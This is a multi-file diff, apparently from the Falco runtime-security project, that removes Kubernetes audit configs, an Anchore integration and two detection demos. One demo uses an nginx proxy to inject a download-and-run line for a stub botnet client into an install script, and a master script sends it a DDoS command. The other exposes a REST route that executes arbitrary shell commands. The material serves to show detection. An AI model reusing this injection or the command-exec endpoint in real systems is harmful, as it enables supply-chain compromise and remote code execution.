# The empty string "" can be used to select non-namespaced resources.
namespaces: ["kube-system"]
# Log configmap changes in all other namespaces at the RequestResponse level.
- level: RequestResponse
resources:
- group: "" # core API group
resources: ["configmaps"]
# Log secret changes in all other namespaces at the Metadata level.
- level: Metadata
resources:
- group: "" # core API group
resources: ["secrets"]
# Log all other resources in core and extensions at the Request level.
- level: Request
resources:
- group: "" # core API group
- group: "extensions" # Version of group should NOT be included.
# A catch-all rule to log all other requests at the Metadata level.
- level: Metadata
# Long-running requests like watches that fall under this rule will not
# generate an audit event in RequestReceived.
omitStages:
- "RequestReceived"

View File

@@ -1,16 +0,0 @@
apiVersion: auditregistration.k8s.io/v1alpha1
kind: AuditSink
metadata:
name: falco-audit-sink
spec:
policy:
level: RequestResponse
stages:
- ResponseComplete
- ResponseStarted
webhook:
throttle:
qps: 10
burst: 15
clientConfig:
url: "http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit"

View File

@@ -1,46 +0,0 @@
#!/usr/bin/env bash
set -euo pipefail
VARIANT=${1:-minikube}
AUDIT_TYPE=${2:-static}
if [ "$VARIANT" == "minikube" ]; then
APISERVER_HOST=$(minikube ip)
SSH_KEY=$(minikube ssh-key)
SSH_USER="docker"
MANIFEST="/etc/kubernetes/manifests/kube-apiserver.yaml"
fi
if [ "$VARIANT" == "kops" ]; then
# APISERVER_HOST=api.your-kops-cluster-name.com
SSH_KEY=~/.ssh/id_rsa
SSH_USER="admin"
MANIFEST=/etc/kubernetes/manifests/kube-apiserver.manifest
if [ -z "${APISERVER_HOST+xxx}" ]; then
echo "***You must specify APISERVER_HOST with the name of your kops api server"
exit 1
fi
fi
echo "***Copying apiserver config patch script to apiserver..."
ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo mkdir -p /var/lib/k8s_audit && sudo chown $SSH_USER /var/lib/k8s_audit"
scp -i $SSH_KEY apiserver-config.patch.sh "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
if [ "$AUDIT_TYPE" == "static" ]; then
echo "***Copying audit policy/webhook files to apiserver..."
scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
scp -i $SSH_KEY webhook-config.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
fi
if [ "$AUDIT_TYPE" == "dynamic+log" ]; then
echo "***Copying audit policy file to apiserver..."
scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
fi
echo "***Modifying k8s apiserver config (will result in apiserver restarting)..."
ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo bash /var/lib/k8s_audit/apiserver-config.patch.sh $MANIFEST $VARIANT $AUDIT_TYPE"
echo "***Done!"

View File

@@ -1,14 +0,0 @@
apiVersion: v1
kind: Config
clusters:
- name: falco
cluster:
server: http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit
contexts:
- context:
cluster: falco
user: ""
name: default-context
current-context: default-context
preferences: {}
users: []

View File

@@ -1,78 +0,0 @@
# Demo of falco with man-in-the-middle attacks on installation scripts
For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
## Demo architecture
### Initial setup
Make sure no prior `botnet_client.py` processes are lying around.
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
* falco: will detect the activities of botnet_client.py.
### Download `install-software.sh`, see botnet client running
Run the following to fetch and execute the installation script,
which also installs the botnet client:
```
$ curl http://localhost/install-software.sh | bash
```
You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).
Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
```
$ ps auxww | grep python
...
root 19983 0.1 0.4 33992 8832 pts/1 S 13:34 0:00 python ./botnet_client.py
$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
```
You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
```
attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
```
At this point, kill the botnet_client.py process to clean things up.
### Run installation script again using `fbash`, note falco warnings.
If you run the installation script again:
```
curl http://localhost/install-software.sh | ./fbash
```
In the docker-compose output, you'll see the following falco warnings:
```
falco | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
```

View File

@@ -1,7 +0,0 @@
#!/bin/sh
while true; do
echo "Trying to contact compromised machine..."
echo "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec" | nc localhost 1234 && echo "**********Contacted compromised machine, sent botnet commands"
sleep 5
done

View File

@@ -1,51 +0,0 @@
# Owned by software vendor, serving install-software.sh.
apache:
container_name: apache
image: httpd:2.4
volumes:
- ${PWD}/web_root:/usr/local/apache2/htdocs
# Owned by software vendor, compromised by attacker.
nginx:
container_name: mitm_nginx
image: nginx:latest
links:
- apache
ports:
- "80:80"
volumes:
- ${PWD}/nginx.conf:/etc/nginx/nginx.conf:ro
# Owned by attacker.
evil_apache:
container_name: evil_apache
image: httpd:2.4
volumes:
- ${PWD}/evil_web_root:/usr/local/apache2/htdocs
ports:
- "9090:80"
# Owned by attacker, constantly trying to contact client.
attacker_botnet_master:
container_name: attacker_botnet_master
image: alpine:latest
net: host
volumes:
- ${PWD}/botnet_master.sh:/tmp/botnet_master.sh
command:
- /tmp/botnet_master.sh
# Owned by client, detects attack by attacker
falco:
container_name: falco
image: falcosecurity/falco:latest
privileged: true
volumes:
- /var/run/docker.sock:/host/var/run/docker.sock
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
- ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
tty: true

View File

@@ -1,18 +0,0 @@
import socket;
import signal;
import os;
os.close(0);
os.close(1);
os.close(2);
signal.signal(signal.SIGINT,signal.SIG_IGN);
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('0.0.0.0', 1234))
serversocket.listen(5);
while 1:
(clientsocket, address) = serversocket.accept();
clientsocket.send('Waiting for botnet command and control commands...\n');
command = clientsocket.recv(1024)
clientsocket.send('Ok, will execute "{}"\n'.format(command.strip()))
clientsocket.close()

View File

@@ -1,15 +0,0 @@
#!/bin/bash
SID=`ps --no-heading -o sess --pid $$`
if [ $SID -ne $$ ]; then
# Not currently a session leader? Run a copy of ourself in a new
# session, with copies of stdin/stdout/stderr.
setsid $0 $@ < /dev/stdin 1> /dev/stdout 2> /dev/stderr &
FBASH=$!
trap "kill $FBASH; exit" SIGINT SIGTERM
wait $FBASH
else
# Just evaluate the commands (from stdin)
source /dev/stdin
fi

View File

@@ -1,12 +0,0 @@
http {
server {
location / {
sub_filter_types '*';
sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
sub_filter_once off;
proxy_pass http://apache:80;
}
}
}
events {
}

View File

@@ -1,156 +0,0 @@
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
set -e
function install_rpm {
if ! hash curl > /dev/null 2>&1; then
echo "* Installing curl"
yum -q -y install curl
fi
echo "*** Installing my-software public key"
# A rpm --import command would normally be here
echo "*** Installing my-software repository"
# A curl path-to.repo <some url> would normally be here
echo "*** Installing my-software"
# A yum -q -y install my-software command would normally be here
echo "*** my-software Installed!"
}
function install_deb {
export DEBIAN_FRONTEND=noninteractive
if ! hash curl > /dev/null 2>&1; then
echo "* Installing curl"
apt-get -qq -y install curl < /dev/null
fi
echo "*** Installing my-software public key"
# A curl <url> | apt-key add - command would normally be here
echo "*** Installing my-software repository"
# A curl path-to.list <some url> would normally be here
echo "*** Installing my-software"
# An apt-get -qq -y install my-software command would normally be here
echo "*** my-software Installed!"
}
function unsupported {
echo 'Unsupported operating system. Please consider writing to the mailing list at'
echo 'https://groups.google.com/forum/#!forum/my-software or trying the manual'
echo 'installation.'
exit 1
}
if [ $(id -u) != 0 ]; then
echo "Installer must be run as root (or with sudo)."
# exit 1
fi
echo "* Detecting operating system"
ARCH=$(uname -m)
if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ]; then
unsupported
fi
if [ -f /etc/debian_version ]; then
if [ -f /etc/lsb-release ]; then
. /etc/lsb-release
DISTRO=$DISTRIB_ID
VERSION=${DISTRIB_RELEASE%%.*}
else
DISTRO="Debian"
VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
fi
case "$DISTRO" in
"Ubuntu")
if [ $VERSION -ge 10 ]; then
install_deb
else
unsupported
fi
;;
"LinuxMint")
if [ $VERSION -ge 9 ]; then
install_deb
else
unsupported
fi
;;
"Debian")
if [ $VERSION -ge 6 ]; then
install_deb
elif [[ $VERSION == *sid* ]]; then
install_deb
else
unsupported
fi
;;
*)
unsupported
;;
esac
elif [ -f /etc/system-release-cpe ]; then
DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')
case "$DISTRO" in
"oracle" | "centos" | "redhat")
if [ $VERSION -ge 6 ]; then
install_rpm
else
unsupported
fi
;;
"amazon")
install_rpm
;;
"fedoraproject")
if [ $VERSION -ge 13 ]; then
install_rpm
else
unsupported
fi
;;
*)
unsupported
;;
esac
else
unsupported
fi

View File

@@ -1,66 +0,0 @@
# Demo of falco with bash exec via poorly designed REST API.
## Introduction
This example shows how a server could have a poorly designed API that
allowed a client to execute arbitrary programs on the server, and how
that behavior can be detected using Sysdig Falco.
`server.js` in this directory defines the server. The poorly designed
API is this route handler:
```javascript
router.get('/exec/:cmd', function(req, res) {
var output = child_process.execSync(req.params.cmd);
res.send(output);
});
app.use('/api', router);
```
It blindly takes the url portion after `/api/exec/<cmd>` and tries to
execute it. A horrible design choice(!), but allows us to easily show
Sysdig falco's capabilities.
## Demo architecture
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* express_server: simple express server exposing a REST API under the endpoint `/api/exec/<cmd>`.
* falco: will detect when you execute a shell via the express server.
### Access urls under `/api/exec/<cmd>` to run arbitrary commands.
Run the following commands to execute arbitrary commands like 'ls', 'pwd', etc:
```
$ curl http://localhost:8181/api/exec/ls
demo.yml
node_modules
package.json
README.md
server.js
```
```
$ curl http://localhost:8181/api/exec/pwd
.../examples/nodejs-bad-rest-api
```
### Try to run bash via `/api/exec/bash`, falco sends alert.
If you try to run bash via `/api/exec/bash`, falco will generate an alert:
```
falco | 22:26:53.536628076: Warning Shell spawned in a container other than entrypoint (user=root container_id=6f339b8aeb0a container_name=express_server shell=bash parent=sh cmdline=bash )
```

View File

@@ -1,21 +0,0 @@
express_server:
container_name: express_server
image: node:latest
command: bash -c "apt-get -y update && apt-get -y install runit && cd /usr/src/app && npm install && runsv /usr/src/app"
ports:
- "8181:8181"
volumes:
- ${PWD}:/usr/src/app
falco:
container_name: falco
image: falcosecurity/falco:latest
privileged: true
volumes:
- /var/run/docker.sock:/host/var/run/docker.sock
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
tty: true

View File

@@ -1,7 +0,0 @@
{
"name": "bad-rest-api",
"main": "server.js",
"dependencies": {
"express": "~4.16.0"
}
}

View File

@@ -1,2 +0,0 @@
#!/bin/sh
node server.js

View File

@@ -1,25 +0,0 @@
var express = require('express'); // call express
var app = express(); // define our app using express
var child_process = require('child_process');
var port = process.env.PORT || 8181; // set our port
// ROUTES FOR OUR API
// =============================================================================
var router = express.Router(); // get an instance of the express Router
// test route to make sure everything is working (accessed at GET http://localhost:8181/api)
router.get('/', function(req, res) {
res.json({ message: 'API available'});
});
router.get('/exec/:cmd', function(req, res) {
var ret = child_process.spawnSync(req.params.cmd, { shell: true});
res.send(ret.stdout);
});
app.use('/api', router);
app.listen(port);
console.log('Server running on port: ' + port);

View File

@@ -139,7 +139,7 @@ stdout_output:
webserver:
enabled: true
listen_port: 8765
k8s_audit_endpoint: /k8s_audit
k8s_audit_endpoint: /k8s-audit
ssl_enabled: false
ssl_certificate: /etc/falco/falco.pem
@@ -167,21 +167,37 @@ http_output:
enabled: false
url: http://some.url
# gRPC server configuration.
# The gRPC server is secure by default (mutual TLS) so you need to generate certificates and update their paths here.
# Falco supports running a gRPC server with two main binding types
# 1. Over the network with mandatory mutual TLS authentication (mTLS)
# 2. Over a local unix socket with no authentication
# By default, the gRPC server is disabled, with no enabled services (see grpc_output)
# please comment/uncomment and change accordingly the options below to configure it.
# Important note: if Falco has any troubles creating the gRPC server
# this information will be logged, however the main Falco daemon will not be stopped.
# gRPC server over network with (mandatory) mutual TLS configuration.
# This gRPC server is secure by default so you need to generate certificates and update their paths here.
# By default the gRPC server is off.
# You can configure the address to bind and expose it.
# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.
# grpc:
# enabled: true
# bind_address: "0.0.0.0:5060"
# # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores
# threadiness: 0
# private_key: "/etc/falco/certs/server.key"
# cert_chain: "/etc/falco/certs/server.crt"
# root_certs: "/etc/falco/certs/ca.crt"
# gRPC server using an unix socket
grpc:
enabled: false
bind_address: "0.0.0.0:5060"
threadiness: 8
private_key: "/etc/falco/certs/server.key"
cert_chain: "/etc/falco/certs/server.crt"
root_certs: "/etc/falco/certs/ca.crt"
bind_address: "unix:///var/run/falco.sock"
# when threadiness is 0, Falco automatically guesses it depending on the number of online cores
threadiness: 0
# gRPC output service.
# By default it is off.
# By enabling this all the output events will be kept in memory until you read them with a gRPC client.
# Make sure to have a consumer for them or leave this disabled.
grpc_output:
enabled: false

View File

@@ -1,2 +0,0 @@
labels:
- area/integration

View File

@@ -1,13 +0,0 @@
FROM python:3-stretch
RUN pip install pipenv
WORKDIR /app
ADD Pipfile /app/Pipfile
ADD Pipfile.lock /app/Pipfile.lock
RUN pipenv install --system --deploy
ADD . /app
CMD ["python", "main.py"]

View File

@@ -1,16 +0,0 @@
[[source]]
url = "https://pypi.python.org/simple"
verify_ssl = true
name = "pypi"
[dev-packages]
doublex-expects = "==0.7.0rc2"
doublex = "*"
mamba = "*"
expects = "*"
[packages]
requests = "*"
[requires]
python_version = "3.7"

View File

@@ -1,161 +0,0 @@
{
"_meta": {
"hash": {
"sha256": "3bdeb3ebfc2760431a59b0a27dc9e747b5d21f9156591ebb7994d94c21f33648"
},
"pipfile-spec": 6,
"requires": {
"python_version": "3.7"
},
"sources": [
{
"name": "pypi",
"url": "https://pypi.python.org/simple",
"verify_ssl": true
}
]
},
"default": {
"certifi": {
"hashes": [
"sha256:59b7658e26ca9c7339e00f8f4636cdfe59d34fa37b9b04f6f9e9926b3cece1a5",
"sha256:b26104d6835d1f5e49452a26eb2ff87fe7090b89dfcaee5ea2212697e1e1d7ae"
],
"version": "==2019.3.9"
},
"chardet": {
"hashes": [
"sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae",
"sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691"
],
"version": "==3.0.4"
},
"idna": {
"hashes": [
"sha256:c357b3f628cf53ae2c4c05627ecc484553142ca23264e593d327bcde5e9c3407",
"sha256:ea8b7f6188e6fa117537c3df7da9fc686d485087abf6ac197f9c46432f7e4a3c"
],
"version": "==2.8"
},
"requests": {
"hashes": [
"sha256:502a824f31acdacb3a35b6690b5fbf0bc41d63a24a45c4004352b0242707598e",
"sha256:7bf2a778576d825600030a110f3c0e3e8edc51dfaafe1c146e39a2027784957b"
],
"index": "pypi",
"version": "==2.21.0"
},
"urllib3": {
"hashes": [
"sha256:2393a695cd12afedd0dcb26fe5d50d0cf248e5a66f75dbd89a3d4eb333a61af4",
"sha256:a637e5fae88995b256e3409dc4d52c2e2e0ba32c42a6365fee8bbd2238de3cfb"
],
"version": "==1.24.3"
}
},
"develop": {
"args": {
"hashes": [
"sha256:a785b8d837625e9b61c39108532d95b85274acd679693b71ebb5156848fcf814"
],
"version": "==0.1.0"
},
"clint": {
"hashes": [
"sha256:05224c32b1075563d0b16d0015faaf9da43aa214e4a2140e51f08789e7a4c5aa"
],
"version": "==0.5.1"
},
"coverage": {
"hashes": [
"sha256:0c5fe441b9cfdab64719f24e9684502a59432df7570521563d7b1aff27ac755f",
"sha256:2b412abc4c7d6e019ce7c27cbc229783035eef6d5401695dccba80f481be4eb3",
"sha256:3684fabf6b87a369017756b551cef29e505cb155ddb892a7a29277b978da88b9",
"sha256:39e088da9b284f1bd17c750ac672103779f7954ce6125fd4382134ac8d152d74",
"sha256:3c205bc11cc4fcc57b761c2da73b9b72a59f8d5ca89979afb0c1c6f9e53c7390",
"sha256:42692db854d13c6c5e9541b6ffe0fe921fe16c9c446358d642ccae1462582d3b",
"sha256:465ce53a8c0f3a7950dfb836438442f833cf6663d407f37d8c52fe7b6e56d7e8",
"sha256:48020e343fc40f72a442c8a1334284620f81295256a6b6ca6d8aa1350c763bbe",
"sha256:4ec30ade438d1711562f3786bea33a9da6107414aed60a5daa974d50a8c2c351",
"sha256:5296fc86ab612ec12394565c500b412a43b328b3907c0d14358950d06fd83baf",
"sha256:5f61bed2f7d9b6a9ab935150a6b23d7f84b8055524e7be7715b6513f3328138e",
"sha256:6899797ac384b239ce1926f3cb86ffc19996f6fa3a1efbb23cb49e0c12d8c18c",
"sha256:68a43a9f9f83693ce0414d17e019daee7ab3f7113a70c79a3dd4c2f704e4d741",
"sha256:6b8033d47fe22506856fe450470ccb1d8ba1ffb8463494a15cfc96392a288c09",
"sha256:7ad7536066b28863e5835e8cfeaa794b7fe352d99a8cded9f43d1161be8e9fbd",
"sha256:7bacb89ccf4bedb30b277e96e4cc68cd1369ca6841bde7b005191b54d3dd1034",
"sha256:839dc7c36501254e14331bcb98b27002aa415e4af7ea039d9009409b9d2d5420",
"sha256:8e679d1bde5e2de4a909efb071f14b472a678b788904440779d2c449c0355b27",
"sha256:8f9a95b66969cdea53ec992ecea5406c5bd99c9221f539bca1e8406b200ae98c",
"sha256:932c03d2d565f75961ba1d3cec41ddde00e162c5b46d03f7423edcb807734eab",
"sha256:93f965415cc51604f571e491f280cff0f5be35895b4eb5e55b47ae90c02a497b",
"sha256:988529edadc49039d205e0aa6ce049c5ccda4acb2d6c3c5c550c17e8c02c05ba",
"sha256:998d7e73548fe395eeb294495a04d38942edb66d1fa61eb70418871bc621227e",
"sha256:9de60893fb447d1e797f6bf08fdf0dbcda0c1e34c1b06c92bd3a363c0ea8c609",
"sha256:9e80d45d0c7fcee54e22771db7f1b0b126fb4a6c0a2e5afa72f66827207ff2f2",
"sha256:a545a3dfe5082dc8e8c3eb7f8a2cf4f2870902ff1860bd99b6198cfd1f9d1f49",
"sha256:a5d8f29e5ec661143621a8f4de51adfb300d7a476224156a39a392254f70687b",
"sha256:a9abc8c480e103dc05d9b332c6cc9fb1586330356fc14f1aa9c0ca5745097d19",
"sha256:aca06bfba4759bbdb09bf52ebb15ae20268ee1f6747417837926fae990ebc41d",
"sha256:bb23b7a6fd666e551a3094ab896a57809e010059540ad20acbeec03a154224ce",
"sha256:bfd1d0ae7e292105f29d7deaa9d8f2916ed8553ab9d5f39ec65bcf5deadff3f9",
"sha256:c22ab9f96cbaff05c6a84e20ec856383d27eae09e511d3e6ac4479489195861d",
"sha256:c62ca0a38958f541a73cf86acdab020c2091631c137bd359c4f5bddde7b75fd4",
"sha256:c709d8bda72cf4cd348ccec2a4881f2c5848fd72903c185f363d361b2737f773",
"sha256:c968a6aa7e0b56ecbd28531ddf439c2ec103610d3e2bf3b75b813304f8cb7723",
"sha256:ca58eba39c68010d7e87a823f22a081b5290e3e3c64714aac3c91481d8b34d22",
"sha256:df785d8cb80539d0b55fd47183264b7002077859028dfe3070cf6359bf8b2d9c",
"sha256:f406628ca51e0ae90ae76ea8398677a921b36f0bd71aab2099dfed08abd0322f",
"sha256:f46087bbd95ebae244a0eda01a618aff11ec7a069b15a3ef8f6b520db523dcf1",
"sha256:f8019c5279eb32360ca03e9fac40a12667715546eed5c5eb59eb381f2f501260",
"sha256:fc5f4d209733750afd2714e9109816a29500718b32dd9a5db01c0cb3a019b96a"
],
"version": "==4.5.3"
},
"doublex": {
"hashes": [
"sha256:4e9f17f346276db7faa461dfa105f17de7f837e5ceccca34f4c70d4ff9d2f20c"
],
"index": "pypi",
"version": "==1.9.2"
},
"doublex-expects": {
"hashes": [
"sha256:5421bd92319c77ccc5a81d595d06e9c9f7f670de342b33e8007a81e70f9fade8"
],
"index": "pypi",
"version": "==0.7.0rc2"
},
"expects": {
"hashes": [
"sha256:419902ccafe81b7e9559eeb6b7a07ef9d5c5604eddb93000f0642b3b2d594f4c"
],
"index": "pypi",
"version": "==0.9.0"
},
"mamba": {
"hashes": [
"sha256:25328151ea94d97a0b461d7256dc7350c99b5f8d2de22d355978378edfeac545"
],
"index": "pypi",
"version": "==0.10"
},
"pyhamcrest": {
"hashes": [
"sha256:6b672c02fdf7470df9674ab82263841ce8333fb143f32f021f6cb26f0e512420",
"sha256:7a4bdade0ed98c699d728191a058a60a44d2f9c213c51e2dd1e6fb42f2c6128a",
"sha256:8ffaa0a53da57e89de14ced7185ac746227a8894dbd5a3c718bf05ddbd1d56cd",
"sha256:bac0bea7358666ce52e3c6c85139632ed89f115e9af52d44b3c36e0bf8cf16a9",
"sha256:f30e9a310bcc1808de817a92e95169ffd16b60cbc5a016a49c8d0e8ababfae79"
],
"version": "==1.9.0"
},
"six": {
"hashes": [
"sha256:3350809f0555b11f552448330d0b52d5f24c91a322ea4a15ef22629740f3761c",
"sha256:d16a0141ec1a18405cd4ce8b4613101da75da0e9a7aec5bdd4fa804d0e0eba73"
],
"version": "==1.12.0"
}
}
}

View File

@@ -1,89 +0,0 @@
# Create Falco rule from Anchore policy result
This integration creates a rule for Falco based on Anchore policy result.
So that when we will try to run an image which has a ```stop``` final action result
in Anchore, Falco will alert us.
## Getting started
### Prerequisites
For running this integration you will need:
* Python 3.6
* pipenv
* An [anchore-engine](https://github.com/anchore/anchore-engine) running
### Configuration
This integration uses the [same environment variables that anchore-cli](https://github.com/anchore/anchore-cli#configuring-the-anchore-cli):
* ANCHORE_CLI_USER: The user used to connect to anchore-engine. By default is ```admin```
* ANCHORE_CLI_PASS: The password used to connect to anchore-engine.
* ANCHORE_CLI_URL: The url where anchore-engine listens. Make sure does not end with a slash. By default is ```http://localhost:8228/v1```
* ANCHORE_CLI_SSL_VERIFY: Flag for enabling if HTTP client verifies SSL. By default is ```true```
### Running
This is a Python program which generates a Falco rule based on anchore-engine
information:
```
pipenv run python main.py
```
And this will output something like:
```yaml
- macro: anchore_stop_policy_evaluation_containers
condition: container.image.id in ("8626492fecd368469e92258dfcafe055f636cb9cbc321a5865a98a0a6c99b8dd", "e86d9bb526efa0b0401189d8df6e3856d0320a3d20045c87b4e49c8a8bdb22c1")
- rule: Run Anchore Containers with Stop Policy Evaluation
desc: Detect containers which does not receive a positive Policy Evaluation from Anchore Engine.
condition: evt.type=execve and proc.vpid=1 and container and anchore_stop_policy_evaluation_containers
output: A stop policy evaluation container from anchore has started (%container.info image=%container.image)
priority: INFO
tags: [container]
```
You can save that output to ```/etc/falco/rules.d/anchore-integration-rules.yaml```
and Falco will start checking this rule.
As long as information in anchore-engine can change, it's a good idea to run this
integration **periodically** and keep the rule synchronized with anchore-engine
policy evaluation result.
## Tests
As long as there are contract tests with anchore-engine, it needs a working
anchore-engine and its environment variables.
```
pipenv install -d
pipenv run mamba --format=documentation
```
## Docker support
### Build the image
```
docker build -t sysdig/anchore-falco .
```
### Running the image
An image exists on DockerHub, its name is ```sysdig/anchore-falco```.
So you can run directly with Docker:
```
docker run --rm -e ANCHORE_CLI_USER=<user-for-custom-anchore-engine> \
-e ANCHORE_CLI_PASS=<password-for-user-for-custom-anchore-engine> \
-e ANCHORE_CLI_URL=http://<custom-anchore-engine-host>:8228/v1 \
sysdig/anchore-falco
```
And this will output the Falco rule based on *custom-anchore-engine-host*.

View File

@@ -1,25 +0,0 @@
import string
FALCO_RULE_TEMPLATE = string.Template('''
- macro: anchore_stop_policy_evaluation_containers
condition: container.image.id in ($images)
- rule: Run Anchore Containers with Stop Policy Evaluation
desc: Detect containers which does not receive a positive Policy Evaluation from Anchore Engine.
condition: evt.type=execve and proc.vpid=1 and container and anchore_stop_policy_evaluation_containers
output: A stop policy evaluation container from anchore has started (%container.info image=%container.image)
priority: INFO
tags: [container]
''')
class CreateFalcoRuleFromAnchoreStopPolicyResults:
def __init__(self, anchore_client):
self._anchore_client = anchore_client
def run(self):
images = self._anchore_client.get_images_with_policy_result('stop')
images = ['"{}"'.format(image) for image in images]
return FALCO_RULE_TEMPLATE.substitute(images=', '.join(images))

View File

@@ -1,39 +0,0 @@
import requests
class AnchoreClient:
def __init__(self, user, password, url, ssl_verify):
self._user = user
self._password = password
self._url = url
self._ssl_verify = ssl_verify
def get_images_with_policy_result(self, policy_result):
results = []
for image in self._get_all_images():
final_action = self._evaluate_image(image)
if final_action == 'stop':
results.append(image['image_id'])
return results
def _get_all_images(self):
response = self._do_get_request(self._url + '/images')
return [
{
'image_id': image['image_detail'][0]['imageId'],
'image_digest': image['image_detail'][0]['imageDigest'],
'full_tag': image['image_detail'][0]['fulltag']
} for image in response.json()]
def _do_get_request(self, url):
return requests.get(url,
auth=(self._user, self._password),
verify=self._ssl_verify,
headers={'Content-Type': 'application/json'})
def _evaluate_image(self, image):
response = self._do_get_request(self._url + '/images/{}/check?tag={}'.format(image['image_digest'], image['full_tag']))
if response.status_code == 200:
return response.json()[0][image['image_digest']][image['full_tag']][0]['detail']['result']['final_action']

View File

@@ -1,21 +0,0 @@
import os
import actions, infrastructure
def main():
anchore_client = infrastructure.AnchoreClient(
os.environ.get('ANCHORE_CLI_USER', 'admin'),
os.environ['ANCHORE_CLI_PASS'],
os.environ.get('ANCHORE_CLI_URL', 'http://localhost:8228/v1'),
os.environ.get('ANCHORE_CLI_SSL_VERIFY', True)
)
action = actions.CreateFalcoRuleFromAnchoreStopPolicyResults(anchore_client)
result = action.run()
print(result)
if __name__ == '__main__':
main()

View File

@@ -1,21 +0,0 @@
from mamba import description, it, before
from expects import expect, contain
from doublex import Stub, when
import actions
import infrastructure
with description(actions.CreateFalcoRuleFromAnchoreStopPolicyResults) as self:
with before.each:
self.anchore_client = Stub(infrastructure.AnchoreClient)
self.action = actions.CreateFalcoRuleFromAnchoreStopPolicyResults(self.anchore_client)
with it('queries Anchore Server for images with Stop as policy results'):
image_id = 'any image id'
when(self.anchore_client).get_images_with_policy_result('stop').returns([image_id])
result = self.action.run()
expect(result).to(contain(image_id))

View File

@@ -1,19 +0,0 @@
from mamba import description, it
from expects import expect, have_length, be_above
import os
import infrastructure
with description(infrastructure.AnchoreClient) as self:
with it('retrieves images with stop policy results'):
user = os.environ['ANCHORE_CLI_USER']
password = os.environ['ANCHORE_CLI_PASS']
url = os.environ['ANCHORE_CLI_URL']
client = infrastructure.AnchoreClient(user, password, url, True)
result = client.get_images_with_policy_result('stop')
expect(result).to(have_length(be_above(1)))

View File

@@ -1,120 +0,0 @@
# Example Kubernetes Daemon Sets for Falco
This directory gives you the required YAML files to stand up Falco on Kubernetes as a Daemon Set. This will result in a Falco Pod being deployed to each node, and thus the ability to monitor any running containers for abnormal behavior.
The two options are provided to deploy a Daemon Set:
- `k8s-with-rbac` - This directory provides a definition to deploy a Daemon Set on Kubernetes with RBAC enabled.
- `k8s-without-rbac` - This directory provides a definition to deploy a Daemon Set on Kubernetes without RBAC enabled. **This method is deprecated in favor of RBAC-based installs, and won't be updated going forward.**
Also provided:
- `falco-event-generator-deployment.yaml` - A Kubernetes Deployment to generate sample events. This is useful for testing, but note it will generate a large number of events.
## Deploying to Kubernetes with RBAC enabled
Since v1.8 RBAC has been available in Kubernetes, and running with RBAC enabled is considered the best practice. The `k8s-with-rbac` directory provides the YAML to create a Service Account for Falco, as well as the ClusterRoles and bindings to grant the appropriate permissions to the Service Account.
```
